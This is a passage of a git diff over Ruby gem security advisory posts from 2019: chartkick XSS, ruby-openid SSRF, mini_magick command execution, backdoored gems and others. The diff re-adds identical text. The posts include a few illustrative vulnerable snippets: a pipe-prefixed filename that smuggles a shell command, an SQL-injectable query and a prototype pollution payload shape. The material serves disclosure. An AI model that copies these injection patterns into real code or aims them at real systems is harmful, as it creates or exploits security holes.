-layout: advisory
-title: 'CVE-2019-12732 (chartkick): XSS Vulnerability in Chartkick Ruby Gem'
-comments: false
-categories:
-- chartkick
-advisory:
-  gem: chartkick
-  cve: 2019-12732
-  ghsa: g45g-g52h-39rg
-  url: https://github.com/ankane/chartkick/issues/488
-  title: XSS Vulnerability in Chartkick Ruby Gem
-  date: 2019-06-04
-  description: |
-    Chartkick is vulnerable to a cross-site scripting (XSS) attack if
-    both the following conditions are met:
-
-    Condition 1:
-      It's used with `ActiveSupport.escape_html_entities_in_json = false`
-      (this is not the default for Rails)
-      OR used with a non-Rails framework like Sinatra.
-
-    Condition 2:
-      Untrusted data or options are passed to a chart.
-
-      <%= line_chart params[:data], min: params[:min] %>
-  cvss_v3: 4.7
-  patched_versions:
-  - ">= 3.2.0"
----
+---
+layout: advisory
+title: 'CVE-2019-12732 (chartkick): XSS Vulnerability in Chartkick Ruby Gem'
+comments: false
+categories:
+- chartkick
+advisory:
+  gem: chartkick
+  cve: 2019-12732
+  ghsa: g45g-g52h-39rg
+  url: https://github.com/ankane/chartkick/issues/488
+  title: XSS Vulnerability in Chartkick Ruby Gem
+  date: 2019-06-04
+  description: |
+    Chartkick is vulnerable to a cross-site scripting (XSS) attack if
+    both the following conditions are met:
+
+    Condition 1:
+      It's used with `ActiveSupport.escape_html_entities_in_json = false`
+      (this is not the default for Rails)
+      OR used with a non-Rails framework like Sinatra.
+
+    Condition 2:
+      Untrusted data or options are passed to a chart.
+
+      <%= line_chart params[:data], min: params[:min] %>
+  cvss_v3: 4.7
+  patched_versions:
+  - ">= 3.2.0"
+---
diff --git a/advisories/_posts/2019-06-13-CVE-2019-11027.md b/advisories/_posts/2019-06-13-CVE-2019-11027.md
index c838eb60..1cde9b31 100644
--- a/advisories/_posts/2019-06-13-CVE-2019-11027.md
+++ b/advisories/_posts/2019-06-13-CVE-2019-11027.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2019-11027 (ruby-openid): ruby-openid SSRF via claimed_id request'
-comments: false
-categories:
-- ruby-openid
-advisory:
-  gem: ruby-openid
-  cve: 2019-11027
-  ghsa: fqfj-cmh6-hj49
-  url: https://github.com/openid/ruby-openid/issues/122
-  date: 2019-06-13
-  title: ruby-openid SSRF via claimed_id request
-  description: |
-    Ruby OpenID (aka ruby-openid) through 2.8.0 has a remotely exploitable
-    flaw. This library is used by Rails web applications to integrate with OpenID Providers.
-    Severity can range from medium to critical, depending on how a web application developer
-    chose to employ the ruby-openid library. Developers who based their OpenID integration
-    heavily on the "example app" provided by the project are at highest risk.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.9.0"
----
+---
+layout: advisory
+title: 'CVE-2019-11027 (ruby-openid): ruby-openid SSRF via claimed_id request'
+comments: false
+categories:
+- ruby-openid
+advisory:
+  gem: ruby-openid
+  cve: 2019-11027
+  ghsa: fqfj-cmh6-hj49
+  url: https://github.com/openid/ruby-openid/issues/122
+  date: 2019-06-13
+  title: ruby-openid SSRF via claimed_id request
+  description: |
+    Ruby OpenID (aka ruby-openid) through 2.8.0 has a remotely exploitable
+    flaw. This library is used by Rails web applications to integrate with OpenID Providers.
+    Severity can range from medium to critical, depending on how a web application developer
+    chose to employ the ruby-openid library. Developers who based their OpenID integration
+    heavily on the "example app" provided by the project are at highest risk.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.9.0"
+---
diff --git a/advisories/_posts/2019-07-01-CVE-2019-13146.md b/advisories/_posts/2019-07-01-CVE-2019-13146.md
index dc7c8598..40ea0a98 100644
--- a/advisories/_posts/2019-07-01-CVE-2019-13146.md
+++ b/advisories/_posts/2019-07-01-CVE-2019-13146.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2019-13146 (field_test): Arbitrary Variants Via Query Parameters'
-comments: false
-categories:
-- field_test
-advisory:
-  gem: field_test
-  cve: 2019-13146
-  ghsa: wg9m-gw3h-hg83
-  url: https://github.com/ankane/field_test/issues/17
-  title: Arbitrary Variants Via Query Parameters
-  date: 2019-07-01
-  description: |
-    Due to unvalidated input, an attacker can pass in
-    arbitrary variants via query parameters.
-
-    If an application treats variants as trusted, this can
-    lead to potential vulnerabilities like SQL injection
-    or cross-site scripting (XSS). For instance:
-
-    landing_page = field_test(:landing_page)
-    Page.where("key = '#{landing_page}'")
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 0.3.0"
-  patched_versions:
-  - ">= 0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2019-13146 (field_test): Arbitrary Variants Via Query Parameters'
+comments: false
+categories:
+- field_test
+advisory:
+  gem: field_test
+  cve: 2019-13146
+  ghsa: wg9m-gw3h-hg83
+  url: https://github.com/ankane/field_test/issues/17
+  title: Arbitrary Variants Via Query Parameters
+  date: 2019-07-01
+  description: |
+    Due to unvalidated input, an attacker can pass in
+    arbitrary variants via query parameters.
+
+    If an application treats variants as trusted, this can
+    lead to potential vulnerabilities like SQL injection
+    or cross-site scripting (XSS). For instance:
+
+    landing_page = field_test(:landing_page)
+    Page.where("key = '#{landing_page}'")
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 0.3.0"
+  patched_versions:
+  - ">= 0.3.1"
+---
diff --git a/advisories/_posts/2019-07-02-CVE-2019-1020001.md b/advisories/_posts/2019-07-02-CVE-2019-1020001.md
index d022fdcc..1293a69e 100644
--- a/advisories/_posts/2019-07-02-CVE-2019-1020001.md
+++ b/advisories/_posts/2019-07-02-CVE-2019-1020001.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2019-1020001 (yard): Arbitrary path traversal and file access via `yard
-  server`'
-comments: false
-categories:
-- yard
-advisory:
-  gem: yard
-  cve: 2019-1020001
-  ghsa: xfhh-rx56-rxcr
-  url: https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr
-  date: 2019-07-02
-  title: Arbitrary path traversal and file access via `yard server`
-  description: |
-    A path traversal vulnerability was discovered in YARD <= 0.9.19 when using
-    `yard server` to serve documentation. This bug would allow unsanitized HTTP
-    requests to access arbitrary files on the machine of a yard server host under
-    certain conditions.
-
-    The issue is resolved in v0.9.20 and later.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.9.20"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-1020001
-    - https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr
----
+---
+layout: advisory
+title: 'CVE-2019-1020001 (yard): Arbitrary path traversal and file access via `yard
+  server`'
+comments: false
+categories:
+- yard
+advisory:
+  gem: yard
+  cve: 2019-1020001
+  ghsa: xfhh-rx56-rxcr
+  url: https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr
+  date: 2019-07-02
+  title: Arbitrary path traversal and file access via `yard server`
+  description: |
+    A path traversal vulnerability was discovered in YARD <= 0.9.19 when using
+    `yard server` to serve documentation. This bug would allow unsanitized HTTP
+    requests to access arbitrary files on the machine of a yard server host under
+    certain conditions.
+
+    The issue is resolved in v0.9.20 and later.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.9.20"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1020001
+    - https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr
+---
diff --git a/advisories/_posts/2019-07-05-CVE-2019-13354.md b/advisories/_posts/2019-07-05-CVE-2019-13354.md
index f125d2ba..7a530d16 100644
--- a/advisories/_posts/2019-07-05-CVE-2019-13354.md
+++ b/advisories/_posts/2019-07-05-CVE-2019-13354.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-13354 (strong_password): strong_password Ruby gem malicious version
-  causing Remote Code Execution vulnerability'
-comments: false
-categories:
-- strong_password
-advisory:
-  gem: strong_password
-  cve: 2019-13354
-  ghsa: 5h5r-ffc4-c455
-  url: https://withatwist.dev/strong-password-rubygem-hijacked.html
-  title: strong_password Ruby gem malicious version causing Remote Code Execution
-    vulnerability
-  date: 2019-07-05
-  description: |
-    The `strong_password` gem on RubyGems.org was hijacked by a malicious actor. The
-    malicious actor published v0.0.7 containing malicious code that enables an attacker
-    to execute remote code in production.
-
-    Upgrade `strong_password` to v0.0.8 to ensure no malicious code execution is possible.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 0.0.7"
-  patched_versions:
-  - ">= 0.0.8"
----
+---
+layout: advisory
+title: 'CVE-2019-13354 (strong_password): strong_password Ruby gem malicious version
+  causing Remote Code Execution vulnerability'
+comments: false
+categories:
+- strong_password
+advisory:
+  gem: strong_password
+  cve: 2019-13354
+  ghsa: 5h5r-ffc4-c455
+  url: https://withatwist.dev/strong-password-rubygem-hijacked.html
+  title: strong_password Ruby gem malicious version causing Remote Code Execution
+    vulnerability
+  date: 2019-07-05
+  description: |
+    The `strong_password` gem on RubyGems.org was hijacked by a malicious actor. The
+    malicious actor published v0.0.7 containing malicious code that enables an attacker
+    to execute remote code in production.
+
+    Upgrade `strong_password` to v0.0.8 to ensure no malicious code execution is possible.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 0.0.7"
+  patched_versions:
+  - ">= 0.0.8"
+---
diff --git a/advisories/_posts/2019-07-10-CVE-2019-10744.md b/advisories/_posts/2019-07-10-CVE-2019-10744.md
index 70916034..d9ef5aec 100644
--- a/advisories/_posts/2019-07-10-CVE-2019-10744.md
+++ b/advisories/_posts/2019-07-10-CVE-2019-10744.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2019-10744 (lodash-rails): Prototype Pollution in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2019-10744
-  ghsa: jf85-cpcp-j695
-  url: https://github.com/advisories/GHSA-jf85-cpcp-j695
-  title: Prototype Pollution in lodash
-  date: 2019-07-10
-  description: |
-    Versions of `lodash` before 4.17.12 are vulnerable to Prototype
-    Pollution.  The function `defaultsDeep` allows a malicious user
-    to modify the prototype of `Object` via
-    `{constructor: {prototype: {...}}}` causing the addition or
-    modification of an existing property that will exist on all objects.
-
-    ## Recommendation
-
-    Update to version 4.17.12 or later.
-  cvss_v2: 6.4
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 4.17.12"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-10744
-    - https://github.com/lodash/lodash/pull/4336
-    - https://snyk.io/vuln/SNYK-JS-LODASH-450202
-    - https://www.npmjs.com/advisories/1065
-    - https://access.redhat.com/errata/RHSA-2019:3024
-    - https://support.f5.com/csp/article/K47105354
-    - https://www.oracle.com/security-alerts/cpujan2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2020.html
-    - https://security.netapp.com/advisory/ntap-20191004-0005
-    - https://github.com/advisories/GHSA-jf85-cpcp-j695
----
+---
+layout: advisory
+title: 'CVE-2019-10744 (lodash-rails): Prototype Pollution in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2019-10744
+  ghsa: jf85-cpcp-j695
+  url: https://github.com/advisories/GHSA-jf85-cpcp-j695
+  title: Prototype Pollution in lodash
+  date: 2019-07-10
+  description: |
+    Versions of `lodash` before 4.17.12 are vulnerable to Prototype
+    Pollution.  The function `defaultsDeep` allows a malicious user
+    to modify the prototype of `Object` via
+    `{constructor: {prototype: {...}}}` causing the addition or
+    modification of an existing property that will exist on all objects.
+
+    ## Recommendation
+
+    Update to version 4.17.12 or later.
+  cvss_v2: 6.4
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 4.17.12"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10744
+    - https://github.com/lodash/lodash/pull/4336
+    - https://snyk.io/vuln/SNYK-JS-LODASH-450202
+    - https://www.npmjs.com/advisories/1065
+    - https://access.redhat.com/errata/RHSA-2019:3024
+    - https://support.f5.com/csp/article/K47105354
+    - https://www.oracle.com/security-alerts/cpujan2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2020.html
+    - https://security.netapp.com/advisory/ntap-20191004-0005
+    - https://github.com/advisories/GHSA-jf85-cpcp-j695
+---
diff --git a/advisories/_posts/2019-07-12-CVE-2019-13574.md b/advisories/_posts/2019-07-12-CVE-2019-13574.md
index 47701bf7..f56eaec1 100644
--- a/advisories/_posts/2019-07-12-CVE-2019-13574.md
+++ b/advisories/_posts/2019-07-12-CVE-2019-13574.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2019-13574 (mini_magick): Remote command execution via filename'
-comments: false
-categories:
-- mini_magick
-advisory:
-  gem: mini_magick
-  cve: 2019-13574
-  ghsa: r7j3-vvh2-xrpj
-  url: https://benjamin-bouchet.com/blog/vulnerabilite-dans-la-gem-mini_magick-version-4-9-4/
-  title: Remote command execution via filename
-  date: 2019-07-12
-  description: |
-    A remote shell execution vulnerability when using MiniMagick::Image.open with URL coming from unsanitized user input.
-    e.g. `MiniMagick::Image.open("| touch.txt")`
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 4.9.4"
-  related:
-    url:
-    - https://github.com/minimagick/minimagick/commit/4cd5081e58810d3394d27a67219e8e4e0445d851
----
+---
+layout: advisory
+title: 'CVE-2019-13574 (mini_magick): Remote command execution via filename'
+comments: false
+categories:
+- mini_magick
+advisory:
+  gem: mini_magick
+  cve: 2019-13574
+  ghsa: r7j3-vvh2-xrpj
+  url: https://benjamin-bouchet.com/blog/vulnerabilite-dans-la-gem-mini_magick-version-4-9-4/
+  title: Remote command execution via filename
+  date: 2019-07-12
+  description: |
+    A remote shell execution vulnerability when using MiniMagick::Image.open with URL coming from unsanitized user input.
+    e.g. `MiniMagick::Image.open("| touch.txt")`
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 4.9.4"
+  related:
+    url:
+    - https://github.com/minimagick/minimagick/commit/4cd5081e58810d3394d27a67219e8e4e0445d851
+---
diff --git a/advisories/_posts/2019-07-16-CVE-2019-1010306.md b/advisories/_posts/2019-07-16-CVE-2019-1010306.md
index 2633cc91..4f4c425c 100644
--- a/advisories/_posts/2019-07-16-CVE-2019-1010306.md
+++ b/advisories/_posts/2019-07-16-CVE-2019-1010306.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2019-1010306 (slanger): Arbitrary command execution in slanger'
-comments: false
-categories:
-- slanger
-advisory:
-  gem: slanger
-  cve: 2019-1010306
-  ghsa: rg32-m3hf-772v
-  url: https://github.com/stevegraham/slanger/pull/238
-  date: 2019-07-16
-  title: Arbitrary command execution in slanger
-  description: |
-    A remote attacker can execute arbitrary commands by sending a crafted request to the server.
-
-    This is due to the use of `Oj.load` instead of `Oj.strict_load` when processing messages.
-
-    Note that `slanger` is no longer maintained.
-  patched_versions:
-  - ">= 0.6.1"
-  cvss_v3: 9.8
----
+---
+layout: advisory
+title: 'CVE-2019-1010306 (slanger): Arbitrary command execution in slanger'
+comments: false
+categories:
+- slanger
+advisory:
+  gem: slanger
+  cve: 2019-1010306
+  ghsa: rg32-m3hf-772v
+  url: https://github.com/stevegraham/slanger/pull/238
+  date: 2019-07-16
+  title: Arbitrary command execution in slanger
+  description: |
+    A remote attacker can execute arbitrary commands by sending a crafted request to the server.
+
+    This is due to the use of `Oj.load` instead of `Oj.strict_load` when processing messages.
+
+    Note that `slanger` is no longer maintained.
+  patched_versions:
+  - ">= 0.6.1"
+  cvss_v3: 9.8
+---
diff --git a/advisories/_posts/2019-07-16-CVE-2019-13589.md b/advisories/_posts/2019-07-16-CVE-2019-13589.md
index 83f6f093..3b6143f4 100644
--- a/advisories/_posts/2019-07-16-CVE-2019-13589.md
+++ b/advisories/_posts/2019-07-16-CVE-2019-13589.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2019-13589 (paranoid2): Code backdoor in paranoid2'
-comments: false
-categories:
-- paranoid2
-advisory:
-  gem: paranoid2
-  cve: 2019-13589
-  ghsa: 4g4c-8gqh-m4vm
-  url: https://github.com/rubygems/rubygems.org/issues/2051
-  date: 2019-07-16
-  title: Code backdoor in paranoid2
-  description: |
-    The paranoid2 gem 1.1.6 for Ruby, as distributed on RubyGems.org, included
-    a code-execution backdoor inserted by a third party.
-
-    The current version, without this backdoor, is 1.1.5.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "> 1.1.6"
-  - "< 1.1.6"
----
+---
+layout: advisory
+title: 'CVE-2019-13589 (paranoid2): Code backdoor in paranoid2'
+comments: false
+categories:
+- paranoid2
+advisory:
+  gem: paranoid2
+  cve: 2019-13589
+  ghsa: 4g4c-8gqh-m4vm
+  url: https://github.com/rubygems/rubygems.org/issues/2051
+  date: 2019-07-16
+  title: Code backdoor in paranoid2
+  description: |
+    The paranoid2 gem 1.1.6 for Ruby, as distributed on RubyGems.org, included
+    a code-execution backdoor inserted by a third party.
+
+    The current version, without this backdoor, is 1.1.5.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "> 1.1.6"
+  - "< 1.1.6"
+---
diff --git a/advisories/_posts/2019-07-19-CVE-2019-1010266.md b/advisories/_posts/2019-07-19-CVE-2019-1010266.md
index 580bfcb2..f793c45b 100644
--- a/advisories/_posts/2019-07-19-CVE-2019-1010266.md
+++ b/advisories/_posts/2019-07-19-CVE-2019-1010266.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2019-1010266 (lodash-rails): Regular Expression Denial of Service (ReDoS)
-  in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2019-1010266
-  ghsa: x5rq-j2xg-h7qm
-  url: https://github.com/advisories/GHSA-x5rq-j2xg-h7qm
-  title: Regular Expression Denial of Service (ReDoS) in lodash
-  date: 2019-07-19
-  description: |
-    lodash prior to 4.7.11 is affected by: CWE-400: Uncontrolled
-    Resource Consumption. The impact is: Denial of service. The
-    component is: Date handler. The attack vector is: Attacker
-    provides very long strings, which the library attempts
-    to match using a regular expression.
-
-    The fixed version is: 4.7.11.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 4.17.11"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010266
-    - https://github.com/lodash/lodash/issues/3359
-    - https://snyk.io/vuln/SNYK-JS-LODASH-73639
-    - https://github.com/lodash/lodash/commit/5c08f18d365b64063bfbfa686cbb97cdd6267347
-    - https://github.com/lodash/lodash/wiki/Changelog
-    - https://security.netapp.com/advisory/ntap-20190919-0004
-    - https://github.com/advisories/GHSA-x5rq-j2xg-h7qm
----
+---
+layout: advisory
+title: 'CVE-2019-1010266 (lodash-rails): Regular Expression Denial of Service (ReDoS)
+  in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2019-1010266
+  ghsa: x5rq-j2xg-h7qm
+  url: https://github.com/advisories/GHSA-x5rq-j2xg-h7qm
+  title: Regular Expression Denial of Service (ReDoS) in lodash
+  date: 2019-07-19
+  description: |
+    lodash prior to 4.7.11 is affected by: CWE-400: Uncontrolled
+    Resource Consumption. The impact is: Denial of service. The
+    component is: Date handler. The attack vector is: Attacker
+    provides very long strings, which the library attempts
+    to match using a regular expression.
+
+    The fixed version is: 4.7.11.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 4.17.11"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010266
+    - https://github.com/lodash/lodash/issues/3359
+    - https://snyk.io/vuln/SNYK-JS-LODASH-73639
+    - https://github.com/lodash/lodash/commit/5c08f18d365b64063bfbfa686cbb97cdd6267347
+    - https://github.com/lodash/lodash/wiki/Changelog
+    - https://security.netapp.com/advisory/ntap-20190919-0004
+    - https://github.com/advisories/GHSA-x5rq-j2xg-h7qm
+---
diff --git a/advisories/_posts/2019-07-26-CVE-2019-1010191.md b/advisories/_posts/2019-07-26-CVE-2019-1010191.md
index 1a42371e..28b3f96f 100644
--- a/advisories/_posts/2019-07-26-CVE-2019-1010191.md
+++ b/advisories/_posts/2019-07-26-CVE-2019-1010191.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2019-1010191 (marginalia): SQL injection vulnerability via Marginalia::Comment'
-comments: false
-categories:
-- marginalia
-advisory:
-  gem: marginalia
-  cve: 2019-1010191
-  ghsa: hrj5-qp7x-rpg6
-  url: https://github.com/basecamp/marginalia/pull/73
-  title: SQL injection vulnerability via Marginalia::Comment
-  date: 2019-07-26
-  description: |
-    The 'marginalia' gem is affected by a SQL Injection vulnerability. All SQL
-    queries are affected when a user controller argument is added as a component.
-
-    This affects users that add a component that is user controller, for instance
-    a parameter or a header.
-
-    The issue is resolved in version 1.6.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.6"
----
+---
+layout: advisory
+title: 'CVE-2019-1010191 (marginalia): SQL injection vulnerability via Marginalia::Comment'
+comments: false
+categories:
+- marginalia
+advisory:
+  gem: marginalia
+  cve: 2019-1010191
+  ghsa: hrj5-qp7x-rpg6
+  url: https://github.com/basecamp/marginalia/pull/73
+  title: SQL injection vulnerability via Marginalia::Comment
+  date: 2019-07-26
+  description: |
+    The 'marginalia' gem is affected by a SQL Injection vulnerability. All SQL
+    queries are affected when a user controller argument is added as a component.
+
+    This affects users that add a component that is user controller, for instance
+    a parameter or a header.
+
+    The issue is resolved in version 1.6.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.6"
+---
diff --git a/advisories/_posts/2019-07-31-CVE-2018-20857.md b/advisories/_posts/2019-07-31-CVE-2018-20857.md
index 3df09de1..40450bd2 100644
--- a/advisories/_posts/2019-07-31-CVE-2018-20857.md
+++ b/advisories/_posts/2019-07-31-CVE-2018-20857.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2018-20857 (samlr): samlr XML nodes comment attack'
-comments: false
-categories:
-- samlr
-advisory:
-  gem: samlr
-  cve: 2018-20857
-  ghsa: qpxp-5j56-gg3x
-  url: https://github.com/zendesk/samlr/pull/29
-  date: 2019-07-31
-  title: samlr XML nodes comment attack
-  description: |
-    Zendesk Samlr before 2.6.2 allows an XML nodes comment attack such as
-    a name_id node with user@example.com followed by <!---->. and then the attacker's
-    domain name.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.6.2"
----
+---
+layout: advisory
+title: 'CVE-2018-20857 (samlr): samlr XML nodes comment attack'
+comments: false
+categories:
+- samlr
+advisory:
+  gem: samlr
+  cve: 2018-20857
+  ghsa: qpxp-5j56-gg3x
+  url: https://github.com/zendesk/samlr/pull/29
+  date: 2019-07-31
+  title: samlr XML nodes comment attack
+  description: |
+    Zendesk Samlr before 2.6.2 allows an XML nodes comment attack such as
+    a name_id node with user@example.com followed by <!---->. and then the attacker's
+    domain name.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.6.2"
+---
diff --git a/advisories/_posts/2019-07-31-CVE-2019-14281.md b/advisories/_posts/2019-07-31-CVE-2019-14281.md
index 153c2832..bb200103 100644
--- a/advisories/_posts/2019-07-31-CVE-2019-14281.md
+++ b/advisories/_posts/2019-07-31-CVE-2019-14281.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2019-14281 (datagrid): Code execution backdoor in datagrid'
-comments: false
-categories:
-- datagrid
-advisory:
-  gem: datagrid
-  cve: 2019-14281
-  ghsa: rqp5-pg7w-832p
-  url: https://github.com/rubygems/rubygems.org/issues/2072
-  date: 2019-07-31
-  title: Code execution backdoor in datagrid
-  description: |
-    The datagrid gem 1.0.6 for Ruby, as distributed on RubyGems.org, included
-    a code-execution backdoor inserted by a third party.
-  unaffected_versions:
-  - "< 1.0.6"
-  - "> 1.0.6"
-  cvss_v3: 9.8
----
+---
+layout: advisory
+title: 'CVE-2019-14281 (datagrid): Code execution backdoor in datagrid'
+comments: false
+categories:
+- datagrid
+advisory:
+  gem: datagrid
+  cve: 2019-14281
+  ghsa: rqp5-pg7w-832p
+  url: https://github.com/rubygems/rubygems.org/issues/2072
+  date: 2019-07-31
+  title: Code execution backdoor in datagrid
+  description: |
+    The datagrid gem 1.0.6 for Ruby, as distributed on RubyGems.org, included
+    a code-execution backdoor inserted by a third party.
+  unaffected_versions:
+  - "< 1.0.6"
+  - "> 1.0.6"
+  cvss_v3: 9.8
+---
diff --git a/advisories/_posts/2019-07-31-CVE-2019-14282.md b/advisories/_posts/2019-07-31-CVE-2019-14282.md
index 4359fb8c..0db7f11d 100644
--- a/advisories/_posts/2019-07-31-CVE-2019-14282.md
+++ b/advisories/_posts/2019-07-31-CVE-2019-14282.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2019-14282 (simple_captcha2): Code backdoor in simple_captcha2'
-comments: false
-categories:
-- simple_captcha2
-advisory:
-  gem: simple_captcha2
-  cve: 2019-14282
-  ghsa: wg6j-r28m-7293
-  url: https://github.com/rubygems/rubygems.org/issues/2073
-  title: Code backdoor in simple_captcha2
-  date: 2019-07-31
-  description: |
-    The simple_captcha2 gem 0.2.3 for Ruby, as distributed on RubyGems.org,
-    included a code-execution backdoor inserted by a third party.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 0.2.3"
-  - "> 0.2.3"
----
+---
+layout: advisory
+title: 'CVE-2019-14282 (simple_captcha2): Code backdoor in simple_captcha2'
+comments: false
+categories:
+- simple_captcha2
+advisory:
+  gem: simple_captcha2
+  cve: 2019-14282
+  ghsa: wg6j-r28m-7293
+  url: https://github.com/rubygems/rubygems.org/issues/2073
+  title: Code backdoor in simple_captcha2
+  date: 2019-07-31
+  description: |
+    The simple_captcha2 gem 0.2.3 for Ruby, as distributed on RubyGems.org,
+    included a code-execution backdoor inserted by a third party.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 0.2.3"
+  - "> 0.2.3"
+---
diff --git a/advisories/_posts/2019-08-11-CVE-2019-5477.md b/advisories/_posts/2019-08-11-CVE-2019-5477.md
index 3bba01c7..1fb6e39a 100644
--- a/advisories/_posts/2019-08-11-CVE-2019-5477.md
+++ b/advisories/_posts/2019-08-11-CVE-2019-5477.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2019-5477 (rexical): Rexical Command Injection Vulnerability'
-comments: false
-categories:
-- rexical
-advisory:
-  gem: rexical
-  cve: 2019-5477
-  ghsa: cr5j-953j-xw5p
-  url: https://github.com/tenderlove/rexical/commit/a652474dbc66be350055db3e8f9b3a7b3fd75926
-  title: Rexical Command Injection Vulnerability
-  date: 2019-08-11
-  description: |
-    A command injection vulnerability appears in code generated by the Rexical
-    gem versions v1.0.6 and earlier. It allows commands to be executed in a
-    subprocess by Ruby's `Kernel.open` method.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.0.7"
-  related:
-    url:
-    - https://github.com/tenderlove/rexical/blob/master/CHANGELOG.rdoc#107--2019-08-06
-    - https://groups.google.com/forum/#!msg/ruby-security-ann/YMnKFsASOAE/Fw3ocLI0BQAJ
----
+---
+layout: advisory
+title: 'CVE-2019-5477 (rexical): Rexical Command Injection Vulnerability'
+comments: false
+categories:
+- rexical
+advisory:
+  gem: rexical
+  cve: 2019-5477
+  ghsa: cr5j-953j-xw5p
+  url: https://github.com/tenderlove/rexical/commit/a652474dbc66be350055db3e8f9b3a7b3fd75926
+  title: Rexical Command Injection Vulnerability
+  date: 2019-08-11
+  description: |
+    A command injection vulnerability appears in code generated by the Rexical
+    gem versions v1.0.6 and earlier. It allows commands to be executed in a
+    subprocess by Ruby's `Kernel.open` method.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.0.7"
+  related:
+    url:
+    - https://github.com/tenderlove/rexical/blob/master/CHANGELOG.rdoc#107--2019-08-06
+    - https://groups.google.com/forum/#!msg/ruby-security-ann/YMnKFsASOAE/Fw3ocLI0BQAJ
+---
diff --git a/advisories/_posts/2019-08-19-CVE-2019-15224.md b/advisories/_posts/2019-08-19-CVE-2019-15224.md
index 679c2a74..ae8ea715 100644
--- a/advisories/_posts/2019-08-19-CVE-2019-15224.md
+++ b/advisories/_posts/2019-08-19-CVE-2019-15224.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2019-15224 (rest-client): Code execution backdoor in rest-client'
-comments: false
-categories:
-- rest-client
-advisory:
-  gem: rest-client
-  cve: 2019-15224
-  ghsa: 333g-rpr4-7hxq
-  url: https://github.com/rest-client/rest-client/issues/713
-  title: Code execution backdoor in rest-client
-  date: 2019-08-19
-  description: |
-    The rest-client gem 1.6.13 for Ruby, as distributed on RubyGems.org,
-    included a code-execution backdoor inserted by a third party.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "<= 1.6.9"
-  - ">= 1.6.14"
----
+---
+layout: advisory
+title: 'CVE-2019-15224 (rest-client): Code execution backdoor in rest-client'
+comments: false
+categories:
+- rest-client
+advisory:
+  gem: rest-client
+  cve: 2019-15224
+  ghsa: 333g-rpr4-7hxq
+  url: https://github.com/rest-client/rest-client/issues/713
+  title: Code execution backdoor in rest-client
+  date: 2019-08-19
+  description: |
+    The rest-client gem 1.6.13 for Ruby, as distributed on RubyGems.org,
+    included a code-execution backdoor inserted by a third party.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "<= 1.6.9"
+  - ">= 1.6.14"
+---
diff --git a/advisories/_posts/2019-08-20-CVE-2019-15224.md b/advisories/_posts/2019-08-20-CVE-2019-15224.md
index 29f6435b..24b3564b 100644
--- a/advisories/_posts/2019-08-20-CVE-2019-15224.md
+++ b/advisories/_posts/2019-08-20-CVE-2019-15224.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-15224 (omniauth_amazon): Code execution backdoor in omniauth_amazon'
